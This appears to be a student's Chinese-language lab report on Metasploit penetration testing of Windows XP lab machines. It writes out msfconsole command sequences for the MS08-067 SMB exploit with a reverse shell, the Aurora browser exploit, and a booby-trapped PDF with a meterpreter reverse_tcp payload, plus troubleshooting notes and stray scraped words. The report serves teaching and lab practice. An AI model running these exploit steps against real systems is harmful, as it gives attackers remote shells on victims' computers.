msf > search ms08_067_netapi //查看能夠用的工具 [!] Module database cache not built yet, using slow search Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption msf exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.154.129 msf exploit(windows/smb/ms08_067_netapi) > set LPORT 5203 msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.154.144 msf exploit(windows/smb/ms08_067_netapi) > set RPORT 445 //該端口號只能使用445或139,是對應漏洞的固定端口 msf exploit(windows/smb/ms08_067_netapi) > set target 0 msf exploit(windows/smb/ms08_067_netapi) > exploit
一開始反覆出現這個錯誤web
Exploit failed: No encoders encoded the buffer successfully
重啓攻擊機,並新建一個xp靶機,回連成功。
shell
出現如下錯誤:
windows
能夠嘗試關閉防火牆解決。api
可使用show options
查看設置參數的方法。瀏覽器
msf exploit(windows/browser/ms10_002_aurora) > show options Module options (exploit/windows/browser/ms10_002_aurora): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Automatic
進行相應設置:session
在靶機鏈接到該網頁後,直接進入會話sessions -i 4
dom
生成pdf:tcp
msf exploit(windows/browser/ms10_002_aurora) > search adobe_cooltype_sing msf exploit(windows/browser/ms10_002_aurora) > use exploit/windows/fileformat/adobe_cooltype_sing msf exploit(windows/fileformat/adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp msf exploit(windows/fileformat/adobe_cooltype_sing) > set LHOST 192.168.154.129 msf exploit(windows/fileformat/adobe_cooltype_sing) > set LPORT 5203 msf exploit(windows/fileformat/adobe_cooltype_sing) > set FILENAME 20155203dkx.pdf msf exploit(windows/fileformat/adobe_cooltype_sing) > exploit [*] Creating '20155203dkx.pdf' file... [+] 20155203dkx.pdf stored at /root/.msf4/local/20155203dkx.pdf
生成的文件須要在這裏打開顯示隱藏文件夾:
工具
使用監聽模塊回連:
ui
不太明白這個是幹嗎的原本覺得是一個漏洞掃描,直接打開show options查看了參數,設置了RHOSTS,這裏靶機的地址能夠是多個,可是我設置的時候出錯了,實踐代表必須是多個同一網段的主機地址,以後顯示成功,這是表示webdav是開啓的。
scanner/http/prev_dir_same_name_file
模塊這個模塊用來檢索匹配目標主機的指定路徑下的文件。
如下是有關它的功能的描述:
該模塊識別第一個父目錄中與給定目錄路徑具備相同名稱的文件。 示例:PATH爲Test / backup / files /將查找Test路徑下文件/backup/files.ext,.ext爲設定的文件類型。
如下結果說明掃描成功。
實戰的話應該要從具體的靶機環境考慮,不能只依賴msf這個工具。
msf是一個比較全面的工具,從此次實驗中能夠看出msf能作的滲透攻擊仍是很侷限的,必須使用英文版的很是「原始」的xp。可是能從各類角度攻擊成功,很是有成就感
exploit是用來發起攻擊的載體。 payload是執行攻擊的代碼。 encode是攻擊代碼的編碼方式。